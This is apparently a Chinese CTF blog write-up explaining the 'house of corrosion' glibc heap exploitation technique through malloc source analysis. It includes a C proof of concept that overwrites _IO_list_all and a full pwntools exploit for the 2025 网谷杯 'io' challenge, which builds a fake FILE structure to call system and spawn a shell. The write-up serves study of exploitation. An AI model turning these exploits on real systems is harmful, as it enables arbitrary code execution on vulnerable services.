0x00

网谷杯没报名上没打成,但是题目不算难,其中一道堆题用到了house of corrosion,学习一下
参考博客https://xz.aliyun.com/news/6458
https://www.anquanke.com/post/id/263622
源码分析为glibc2.35
这个手法也有针对tcache的变体,这里姑且先只分析针对fastbins的手法,后续再说(咕咕
glibc2.37 之后,global_max_fast 的类型被修改为 int8_t,使用该技巧可以控制的地址范围大大缩小。

0x01 global_max_fast 与 fastbinsY

malloc的初始化时,会设置全局变量global_max_fast的值

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
/*
Initialize a malloc_state struct.

This is called from ptmalloc_init () or from _int_new_arena ()
when creating a new arena.
*/

static void
malloc_init_state (mstate av)
{
int i;
mbinptr bin;

/* Establish circular links for normal bins */
for (i = 1; i < NBINS; ++i)
{
bin = bin_at (av, i);
bin->fd = bin->bk = bin;
}

#if MORECORE_CONTIGUOUS
if (av != &main_arena)
#endif
set_noncontiguous (av);
if (av == &main_arena)
set_max_fast (DEFAULT_MXFAST);
atomic_store_relaxed (&av->have_fastchunks, false);

av->top = initial_top (av);
}

这个默认值是

1
2
3
#ifndef DEFAULT_MXFAST
#define DEFAULT_MXFAST (64 * SIZE_SZ / 4)
#endif

再找到malloc-size.h

1
2
3
4
5
6
#ifndef INTERNAL_SIZE_T
# define INTERNAL_SIZE_T size_t
#endif

/* The corresponding word size. */
#define SIZE_SZ (sizeof (INTERNAL_SIZE_T))

默认是(64 * 8/2) == 0x80,默认情况下fastbins的最大chunk0x80
然后我们看fastbin索引方式,在main_arena

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
struct malloc_state
{
/* Serialize access. */
__libc_lock_define (, mutex);

/* Flags (formerly in max_fast). */
int flags;

/* Set if the fastbin chunks contain recently inserted free blocks. */
/* Note this is a bool but not all targets support atomics on booleans. */
int have_fastchunks;

/* Fastbins */
mfastbinptr fastbinsY[NFASTBINS];

/* Base of the topmost chunk -- not otherwise kept in a bin */
mchunkptr top;

/* The remainder from the most recent split of a small request */
mchunkptr last_remainder;

/* Normal bins packed as described above */
mchunkptr bins[NBINS * 2 - 2];

/* Bitmap of bins */
unsigned int binmap[BINMAPSIZE];

/* Linked list */
struct malloc_state *next;

/* Linked list for free arenas. Access to this field is serialized
by free_list_lock in arena.c. */
struct malloc_state *next_free;

/* Number of threads attached to this arena. 0 if the arena is on
the free list. Access to this field is serialized by
free_list_lock in arena.c. */
INTERNAL_SIZE_T attached_threads;

/* Memory allocated from the system in this arena. */
INTERNAL_SIZE_T system_mem;
INTERNAL_SIZE_T max_system_mem;
};

main_arena中,管理fastbins使用fastbinsY数组,与之相关的定义如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
typedef struct malloc_chunk *mfastbinptr;
#define fastbin(ar_ptr, idx) ((ar_ptr)->fastbinsY[idx])

/* offset 2 to use otherwise unindexable first 2 bins */
#define fastbin_index(sz) \
((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)


/* The maximum fastbin request size we support */
#define MAX_FAST_SIZE (80 * SIZE_SZ / 4)

#define NFASTBINS (fastbin_index (request2size (MAX_FAST_SIZE)) + 1)
...
#define request2size(req) \
(((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE) ? \
MINSIZE : \
((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)

可以看到fastbin_index == (size >> 4) - 2,这就是数组的下标索引方式,对应sizechunk归于对应fastbinsY[fastbin_index(size)]bin链表
我们还是找到malloc.c中将chunk放入fastbins的部分

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())

#if TRIM_FASTBINS
/*
If TRIM_FASTBINS set, don't place chunks
bordering top into fastbins
*/
&& (chunk_at_offset(p, size) != av->top)
#endif
) {

if (__builtin_expect (chunksize_nomask (chunk_at_offset (p, size))
<= CHUNK_HDR_SZ, 0)
|| __builtin_expect (chunksize (chunk_at_offset (p, size))
>= av->system_mem, 0))
{
bool fail = true;
/* We might not have a lock at this point and concurrent modifications
of system_mem might result in a false positive. Redo the test after
getting the lock. */
if (!have_lock)
{
__libc_lock_lock (av->mutex);
fail = (chunksize_nomask (chunk_at_offset (p, size)) <= CHUNK_HDR_SZ
|| chunksize (chunk_at_offset (p, size)) >= av->system_mem);
__libc_lock_unlock (av->mutex);
}

if (fail)
malloc_printerr ("free(): invalid next size (fast)");
}

free_perturb (chunk2mem(p), size - CHUNK_HDR_SZ);

atomic_store_relaxed (&av->have_fastchunks, true);
unsigned int idx = fastbin_index(size);
fb = &fastbin (av, idx);

/* Atomically link P to its fastbin: P->FD = *FB; *FB = P; */
mchunkptr old = *fb, old2;

if (SINGLE_THREAD_P)
{
/* Check that the top of the bin is not the record we are going to
add (i.e., double free). */
if (__builtin_expect (old == p, 0))
malloc_printerr ("double free or corruption (fasttop)");
p->fd = PROTECT_PTR (&p->fd, old);
*fb = p;
}
else
do
{
/* Check that the top of the bin is not the record we are going to
add (i.e., double free). */
if (__builtin_expect (old == p, 0))
malloc_printerr ("double free or corruption (fasttop)");
old2 = old;
p->fd = PROTECT_PTR (&p->fd, old);
}
while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2))
!= old2);

/* Check that size of fastbin chunk at the top is the same as
size of the chunk that we are adding. We can dereference OLD
only if we have the lock, otherwise it might have already been
allocated again. */
if (have_lock && old != NULL
&& __builtin_expect (fastbin_index (chunksize (old)) != idx, 0))
malloc_printerr ("invalid fastbin entry (free)");
}

可以看到最起初判断chunksize使用了get_max_fast函数,如下

1
2
3
4
5
6
7
8
9
10
11
12
13
static inline INTERNAL_SIZE_T
get_max_fast (void)
{
/* Tell the GCC optimizers that global_max_fast is never larger
than MAX_FAST_SIZE. This avoids out-of-bounds array accesses in
_int_malloc after constant propagation of the size parameter.
(The code never executes because malloc preserves the
global_max_fast invariant, but the optimizers may not recognize
this.) */
if (global_max_fast > MAX_FAST_SIZE)
__builtin_unreachable ();
return global_max_fast;
}

如果global_max_fast > MAX_FAST_SIZE(在前面的定义中可以看到,MAX_FAST_SIZE(80 * SIZE_SZ / 4) == 0xa0)就会进入__builtin_unreachable ();,这是个什么东西?
__builtin_unreachable() 是一个非常重要且强大的编译器内置函数,主要用于性能优化。它存在于 GCC 和 Clang 等主流 C/C++ 编译器中。简单来说,它的核心行为是告诉编译器,程序执行流程绝对、永远不可能到达这个点。如果程序在运行时真的执行到了 __builtin_unreachable(),其行为是“未定义行为” (Undefined Behavior, UB)
这里我们先放着,后续再说
往下看,最关键的部分

1
2
3
4
5
6
7
...
unsigned int idx = fastbin_index(size);
fb = &fastbin (av, idx);

/* Atomically link P to its fastbin: P->FD = *FB; *FB = P; */
mchunkptr old = *fb, old2;
...

这是先按照索引方式,取到在fastbinsY中的索引,然后再取到fastbinsY数组中对应项的地址(指向对应bin单链表头结点的指针)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
...
if (SINGLE_THREAD_P)
{
/* Check that the top of the bin is not the record we are going to
add (i.e., double free). */
if (__builtin_expect (old == p, 0))
malloc_printerr ("double free or corruption (fasttop)");
p->fd = PROTECT_PTR (&p->fd, old);
*fb = p;
}
else
do
{
/* Check that the top of the bin is not the record we are going to
add (i.e., double free). */
if (__builtin_expect (old == p, 0))
malloc_printerr ("double free or corruption (fasttop)");
old2 = old;
p->fd = PROTECT_PTR (&p->fd, old);
}
while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2))
!= old2);
...

然后,如果SINGLE_THREAD_P(单线程环境),则直接头插法插入;如果是多线程环境,则使用原子操作 compare_and_exchange 来安全插入(搬运自gpt)总之就是插入
我们于是能注意到,这里对于fastbinsY数组的索引并没有检查,如果我们能让一个size大的chunk进入这个分支,则fastbin_index的计算就会溢出fastbinsY数组的范围,那么后续的操作也就会导致越界读写

0x02 攻击手法

越界写入时的示意图如下,我们申请对应size(注意是size域为对应值而非malloc(size))的chunkA,修改global_max_fast,然后free这个chunkA,此时就向目标地址写入了一个堆地址

接着我们修改A->fd (此处仅仅示意,需要注意safe-linking)

那么我们再次将chunkA申请回来,就实现了写入

那么这里size如何得知呢?根据fastbin_index == (size >> 4) - 2,并且fastbinsY数组每一项为0x8,我们计算

1
2
3
4
offset = target_addr - fastbinY_addr
idx = offset / 0x8
(size >> 4) - 2 == idx --> size == ((offset + 0x10) / 0x8) << 4 == ((offset + 0x10) / 0x8) * 0x10
== offset*2 + 0x20

所以我们需要的chunksize域为offset*2 + 0x20
至于偏移

1
2
pwndbg> p &main_arena.fastbinsY
$1 = (mfastbinptr (*)[10]) 0x7ffff7e1ac90 <main_arena+16>

**无需泄露libc_base**也能得出
PoC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
#include <stdio.h>
#include <stdlib.h>

int main()
{
puts("Poc");
size_t libc_base = &puts - 0x80e50;
size_t global_max_fast_addr = libc_base + 0x221500;
size_t _IO_list_all = libc_base + 0x21b680;
size_t fastbinsY_addr = libc_base + 0x21ac90;
size_t size = (_IO_list_all - fastbinsY_addr)*2 + 0x20;

printf("libc_base: %p\n", (void *)libc_base);
printf("my_global_max_fast: %p\n", (void *)global_max_fast_addr);
printf("_IO_list_all: %p\n", (void *)_IO_list_all);
printf("fastbinsY: %p\n", (void *)fastbinsY_addr);
printf("size: %zx\n", size);
printf("_IO_list_all: %llx\n", *(unsigned long long *)_IO_list_all);

void *p1 = malloc(size - 0x10);
void *p2 = malloc(0x60);

*((size_t*)global_max_fast_addr) = 0x7fffffffffffffff;
free(p1);
((size_t*)p1)[0] = ((size_t)p1 >> 12)^0xdeadbeef;
malloc(size - 0x10);
printf("_IO_list_all: %llx\n", *(size_t*)_IO_list_all);

return 0;
}
// glibc2.35
//gcc pwn.c -o pwn -g

我们调试一下,起初

1
2
pwndbg> p/x global_max_fast
$1 = 0x80

然后我们修改其为一个很大的值,再free(p1)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x555555559000
Size: 0x290 (with flag bits: 0x291)

Allocated chunk | PREV_INUSE
Addr: 0x555555559290
Size: 0x410 (with flag bits: 0x411)

Allocated chunk | PREV_INUSE
Addr: 0x5555555596a0
Size: 0x1400 (with flag bits: 0x1401)

Allocated chunk | PREV_INUSE
Addr: 0x55555555aaa0
Size: 0x70 (with flag bits: 0x71)

Top chunk | PREV_INUSE
Addr: 0x55555555ab10
Size: 0x1f4f0 (with flag bits: 0x1f4f1)

pwndbg> p _IO_list_all
$3 = 140737352152704
pwndbg> p/x _IO_list_all
$4 = 0x7ffff7e1b680
pwndbg> x/gx 0x7ffff7e1b680
0x7ffff7e1b680 <_IO_list_all>: 0x00005555555596a0

可以看到目标地址_IO_list_all已经指向了一个堆地址(因为我们破坏了global_max_fast所以这里关于heap的调试有点异常)
一般来说如果我们进行IO攻击的话,这里就已经达成目的了,向_IO_list_all写入了一个堆地址(并且是堆头地址),我们可以在这个p1中伪造数据来打一些house(当然需要uaf
后续几步就是写一个值进target,任意地址写任意值的效果,注意这里fastbin在当下版本是存在safe-linking保护的,见此前博客
最后看一下效果

1
2
3
4
5
6
7
8
9
10
11
12
13
14
 ── r3t2@LAPTOP-6JKPOVPE:~/ctf/pwn_demos/corr
│ 22:58:03
── $ ./pwn
Poc
libc_base: 0x701432800000
my_global_max_fast: 0x701432a21500
_IO_list_all: 0x701432a1b680
fastbinsY: 0x701432a1ac90
size: 1400
_IO_list_all: 701432a1b6a0
_IO_list_all: deadbeef
Segmentation fault (core dumped)

► 0x7ffff7c8ea66 <_IO_flush_all_lockp+390> mov eax, dword ptr [r15 + 0xc0] <Cannot dereference [0xdeadbfaf]>

因为我们随便写入了0xdeadbeef,程序退出执行_IO_cleanup自然会崩溃
值得一提的是,这里我们修改global_max_fast为一较大值,get_max_fast函数并没有导致程序崩溃,推测是此前__builtin_unreachable ();的行为使得编译器优化了这一判断
另外,与上面写的原理类似,fastbinsY数组越界后,根据头插法来插入chunk,那么越界到达处的地址会写入chunkfd域,可以读出libc地址,然而,在safe-linking引入后,这并不实用,不再赘述

0x03 网谷杯2025 io

菜单

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
void __fastcall __noreturn main(int a1, char **a2, char **a3)
{
int v3; // [rsp+4h] [rbp-Ch] BYREF
unsigned __int64 v4; // [rsp+8h] [rbp-8h]

v4 = __readfsqword(0x28u);
setbuf(stdout, 0LL);
setbuf(stderr, 0LL);
setbuf(stdin, 0LL);
while ( 1 )
{
menu();
__isoc99_scanf("%u", &v3);
switch ( v3 )
{
case 1:
add();
break;
case 2:
edit();
break;
case 3:
delete();
break;
case 4:
exit(0);
}
}
}

看各个选项

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
unsigned __int64 add()
{
unsigned int size; // [rsp+8h] [rbp-18h] BYREF
int idx; // [rsp+Ch] [rbp-14h]
void *buf; // [rsp+10h] [rbp-10h]
unsigned __int64 v4; // [rsp+18h] [rbp-8h]

v4 = __readfsqword(0x28u);
puts("Content length:");
__isoc99_scanf("%u", &size);
if ( size <= 0x90 || size > 0x1666 )
{
puts("Invalid size");
}
else
{
buf = malloc(size);
for ( idx = 0; idx <= 4; ++idx )
{
if ( !chunk_list[idx] )
{
chunk_list[idx] = buf;
puts("Please input your data:");
read(0, buf, size);
puts("Your data:");
puts((const char *)buf);
puts("Done!");
break;
}
}
if ( idx == 5 )
{
free(buf);
puts("Too many chunks!");
}
}
return __readfsqword(0x28u) ^ v4;
}

add 可以输入数据且有输出,且 size 范围较大,可以用来 leak

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
unsigned __int64 edit()
{
_QWORD buf[6]; // [rsp+8h] [rbp-38h] BYREF
unsigned __int64 v2; // [rsp+38h] [rbp-8h]

v2 = __readfsqword(0x28u);
puts("As if nothing can be done, but it seems useful?");
read(0, buf, 0x28uLL);
qword_202100 = buf[0];
qword_202108 = buf[2];
qword_202110 = buf[3];
qword_202118 = buf[4];
qword_202120 = buf[0];
*(_QWORD *)buf[0] = 0xDEADBEEFCAFEBABELL;
return __readfsqword(0x28u) ^ v2;
}

并不能编辑,但是可以任意地址写一个大数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
unsigned __int64 delete()
{
unsigned int idx; // [rsp+4h] [rbp-Ch] BYREF
unsigned __int64 v2; // [rsp+8h] [rbp-8h]

v2 = __readfsqword(0x28u);
puts("Content id:");
__isoc99_scanf("%u", &idx);
if ( idx <= 4 && chunk_list[idx] )
{
free((void *)chunk_list[idx]);
chunk_list[idx] = 0LL;
puts("Delete is done!");
}
else
{
puts("Invalid id");
}
return __readfsqword(0x28u) ^ v2;
}

delete ,无 uaf
exit,直接打house of corrosion + house of apple2,exp如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
#!/usr/bin/env python3
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.31-0ubuntu9.9/amd64/libc6_2.31-0ubuntu9.9_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 1337
elf = context.binary = ELF(filename)
if libcname:
libc = ELF(libcname)
gs = '''
b *$rebase(0x93A)
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.31-0ubuntu9.9/amd64/libc6-dbg_2.31-0ubuntu9.9_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.31-0ubuntu9.9/amd64/glibc-source_2.31-0ubuntu9.9_all/usr/src/glibc/glibc-2.31
'''

def start():
if args.P:
return process(elf.path)
elif args.R:
return remote(host, port)
else:
return gdb.debug(elf.path, gdbscript = gs)


io = start()

#
menu = b'exit'

def add(size, data = b'deadbeef'):
io.recvuntil(menu)
io.sendline(b'1')
io.recvuntil(b'length:')
io.sendline(str(size))
io.recvuntil(b'data:')
io.send(data)

def free(idx):
io.recvuntil(menu)
io.sendline(b'3')
io.recvuntil(b'id:')
io.sendline(str(idx))

def edit(data):
io.recvuntil(menu)
io.sendline(b'2')
io.recvuntil(b'?')
io.send(data)

def ex():
io.recvuntil(menu)
io.sendline(b'4')

add(0x500) #0
add(0x500) #1
free(0) #0 -> unsortedbin
add(0x500) #0
io.recvuntil(b'deadbeef')
libc_base = u64(io.recv(6).ljust(0x8, b'\x00')) - 96 - 0x1ecb80
log.info("libc_base --> "+hex(libc_base))

free(0)
add(0x600) #0 previous 0 -> largebin
add(0x500, b'a'*0x10) #2 previous 0
io.recvuntil(b'a'*0x10)
heap_base = u64(io.recv(6).ljust(0x8, b'\x00')) - 0x290
log.info("heap_base --> "+hex(heap_base))

global_max_fast = libc_base + 0x1eeea0
fastbinsY = libc_base + 0x1ecb80 + 0x10
offset = libc_base + libc.sym['_IO_list_all'] - fastbinsY
size = offset*2 + 0x20
log.info("size --> "+hex(size))

chunk_addr = heap_base + 0x290 + 0x510*2 + 0x610 + 0x510
log.info("fake_io addr --> "+hex(chunk_addr))
io_wfile_jumps = libc_base + libc.sym['_IO_wfile_jumps']
system = libc_base + libc.sym['system']

fake_IO_file = p64(0) * 2 + p64(1) + p64(2)
fake_IO_file = fake_IO_file.ljust(0xa0 - 0x10, b'\x00') + p64(chunk_addr + 0x100) #wide_data
fake_IO_file = fake_IO_file.ljust(0xc0 - 0x10, b'\x00') + p64(0xffffffffffffffff) #mode
fake_IO_file = fake_IO_file.ljust(0xd8 - 0x10, b'\x00') + p64(io_wfile_jumps) #vtable
fake_IO_file = fake_IO_file.ljust(0x100 - 0x10 + 0xe0, b'\x00') + p64(chunk_addr + 0x200) #_wide_data->_wide_vtable
fake_IO_file = fake_IO_file.ljust(0x200 - 0x10 + 0x68, b'\x00') + p64(system) # _wide_data->_wide_vtable->doallocate

add(0x508) #3
add(size - 0x10, fake_IO_file) #4
free(3)
add(0x508, b'a'*0x500 + p32(0xfbadf7f5) + b';sh\x00') #3 to edit fake_io -> _flags
edit(p64(global_max_fast))
free(4) #io_list_all -> fake_io

ex()

io.interactive()

效果

1
2
3
4
5
6
7
8
9
10
11
12
13
14
[*] Switching to interactive mode

[DEBUG] Received 0x17 bytes:
00000000 73 68 3a 20 31 3a 20 f5 f7 ad fb 3a 20 6e 6f 74 │sh: │1: ·│···:│ not│
00000010 20 66 6f 75 6e 64 0a │ fou│nd·│
00000017
sh: 1: \xf5\xf7\xad\xfb: not found
$ whoami
[DEBUG] Sent 0x7 bytes:
b'whoami\n'
[DEBUG] Received 0x5 bytes:
b'r3t2\n'
r3t2
$